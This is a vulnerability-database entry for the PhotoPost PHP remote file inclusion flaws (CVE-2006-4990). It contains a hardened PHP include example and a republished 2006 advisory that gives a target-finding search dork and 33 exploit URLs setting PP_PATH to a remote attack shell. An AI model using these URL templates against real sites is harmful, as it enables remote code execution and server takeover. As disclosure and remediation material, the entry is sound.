PhotoPost Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID 1193401 Vulnerability type Unknown
Published 2006-09-25 Updated 2006-09-27
CVE ID CVE-2006-4990 CNNVD-ID CNNVD-200609-438
Platform N/A CVSS score 7.5
|Source
https://cxsecurity.com/issue/WLB-2006090159
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-438
|Details
Multiple PHP remote file inclusion vulnerabilities exist in PhotoPost. A remote attacker can execute arbitrary PHP code by supplying a URL in the PP_PATH parameter of the following files: (1) addfav.php, (2) adm-admlog.php, (3) adm-approve.php, (4) adm-backup.php, (5) adm-cats.php, (6) adm-cinc.php, (7) adm-db.php, (8) adm-editcfg.php, (9) adm-inc.php, (10) adm-index.php, (11) adm-modcom.php, (12) adm-move.php, (13) adm-options.php, (14) adm-order.php, (15) adm-pa.php, (16) adm-photo.php, (17) adm-purge.php, (18) adm-style.php, (19) adm-templ.php, (20) adm-userg.php, (21) adm-users.php, (22) bulkupload.php, (23) cookies.php, (24) comments.php, (25) ecard.php, (26) editphoto.php, (27) register.php, (28) showgallery.php, (29) showmembers.php, (30) useralbums.php, (31) uploadphoto.php, (32) search.php or (33) adm-menu.php.
|Exploit
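The root cause is an include whose base path is a plain variable (`$PP_PATH`) that a request parameter can overwrite, so `require "$PP_PATH/languages/$pplang/addfav.php"` ends up fetching and executing a remote script. The following is an added example, not code from the PhotoPost project or from the advisory: it shows the hardened form of that include pattern. It assumes PHP 7.1 or later, that the script sits in the application root with language packs in `languages/<name>/`, and that the language name arrives in a cookie called `pplang` with `english` as the default (both names are assumptions for illustration).

```php
<?php
// Added example (not PhotoPost's own code): a hardened version of
//   require "$PP_PATH/languages/$pplang/addfav.php";
// Assumptions: PHP 7.1+, this file lives in the application root,
// language packs are directories under languages/, and the language
// name comes from an untrusted cookie named "pplang" (assumed name).

// 1. The base path is a constant derived from the script's own location.
//    A constant cannot be overwritten by register_globals or by any
//    request parameter, which is what made $PP_PATH attacker-controlled.
define('PP_PATH', __DIR__);

// 2. Resolve a user-supplied language pack name to a file that is
//    provably inside languages/, or return null. URLs, "..", null bytes
//    and anything that is not a plain directory name are rejected.
function pp_language_file(string $pplang, string $file): ?string
{
    // Only simple identifiers are acceptable language pack names.
    if (!preg_match('/^[a-z][a-z0-9_-]{0,31}$/i', $pplang)) {
        return null;
    }
    $base = realpath(PP_PATH . '/languages');
    if ($base === false) {
        return null;
    }
    // realpath() canonicalises symlinks and "..", and returns false when
    // the target does not exist, so a prefix check on the result is a
    // reliable containment test.
    $candidate = realpath($base . '/' . $pplang . '/' . $file);
    if ($candidate === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// 3. Fall back to the default pack instead of trusting the request.
$pplang   = isset($_COOKIE['pplang']) ? (string) $_COOKIE['pplang'] : 'english';
$langFile = pp_language_file($pplang, 'addfav.php')
         ?? pp_language_file('english', 'addfav.php');
if ($langFile === null) {
    http_response_code(500);
    exit('Language pack missing');
}

// Every include now uses the constant base path or a validated file.
require PP_PATH . '/pp-inc.php';
require $langFile;
require PP_PATH . '/login-inc.php';
```

Two configuration checks complement the code change on any PHP host still running software of this generation: `register_globals` must be off, so that query parameters never become variables like `$PP_PATH`, and `allow_url_include` should be off, so that `require` refuses `http://` and `ftp://` paths outright even if a path variable is somehow controlled.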
######################################################################################
#
#     PhotoPost PHP  4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability
#
######################################################################################
#      Found by ..........: AG-Spider
#      our Web Site : ----  http://www.ArabAttack.com
#                      Arab Attack Security Team
######################################################################################
#      Affected Software .: PhotoPost PHP
#      Vendor ............: http://www.popphoto.com
#      Risk & Class...: high-Remote File Inclusion
#      C0ntAct ...........: AG-Spider [at] msn [dot] com
######################################################################################
#
#             require "pp-inc.php";
#             require "$PP_PATH/languages/$pplang/addfav.php";
#             require "$PP_PATH/login-inc.php";
#
######################################################################################
#       Dork :"Powered by: PhotoPost PHP 4.6"
#                  "Powered by: PhotoPost PHP 4.5"
#
#     Exploit :-
#
#     http://[target]/[path]/addfav.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-admlog.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-approve.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-backup.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-cats.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-cinc.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-db.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-editcfg.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-inc.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-index.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-modcom.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-move.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-options.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-order.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-pa.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-photo.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-purge.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-style.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-templ.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-userg.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-users.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/bulkupload.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/cookies.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/comments.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/ecard.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/editphoto.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/register.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/showgallery.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/showmembers.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/useralbums.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/uploadphoto.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/search.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-menu.php?PP_PATH=[Attack Shell]?
######################################################################################
#
#
#     Greets 2 : Black-c0de <> KaBaRa.HaCk.eGy <> KILLERxXx <> CRASH_OVER_RIDE <> SwEEt-deVil <> Young Hacker
#     our Web Site : ----  http://www.ArabAttack.com
#                      Arab Attack Security Team
######################################################################################
#
#     thx 2 :::::: Lezr.com
#
######################################################################################

|References

Source: BUGTRAQ
Name: 20060918 PhotoPost PHP 4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/446224/100/0/threaded
Source: OSVDB
Name: 32253
Link: http://www.osvdb.org/32253
Source: OSVDB
Name: 32252
Link: http://www.osvdb.org/32252
Source: OSVDB
Name: 32251
Link: http://www.osvdb.org/32251
Source: OSVDB
Name: 32250
Link: http://www.osvdb.org/32250
Source: OSVDB
Name: 32249
Link: http://www.osvdb.org/32249
Source: OSVDB
Name: 32248
Link: http://www.osvdb.org/32248
Source: OSVDB
Name: 32247
Link: http://www.osvdb.org/32247
Source: OSVDB
Name: 32246
Link: http://www.osvdb.org/32246
Source: OSVDB
Name: 32245
Link: http://www.osvdb.org/32245
Source: OSVDB
Name: 32243
Link: http://www.osvdb.org/32243
Source: OSVDB
Name: 32240
Link: http://www.osvdb.org/32240
Source: OSVDB
Name: 32239
Link: http://www.osvdb.org/32239
Source: OSVDB
Name: 32238
Link: http://www.osvdb.org/32238
Source: OSVDB
Name: 32237
Link: http://www.osvdb.org/32237
Source: OSVDB
Name: 32236
Link: http://www.osvdb.org/32236
Source: OSVDB
Name: 32235
Link: http://www.osvdb.org/32235
Source: OSVDB
Name: 32234
Link: http://www.osvdb.org/32234
Source: OSVDB
Name: 32233
Link: http: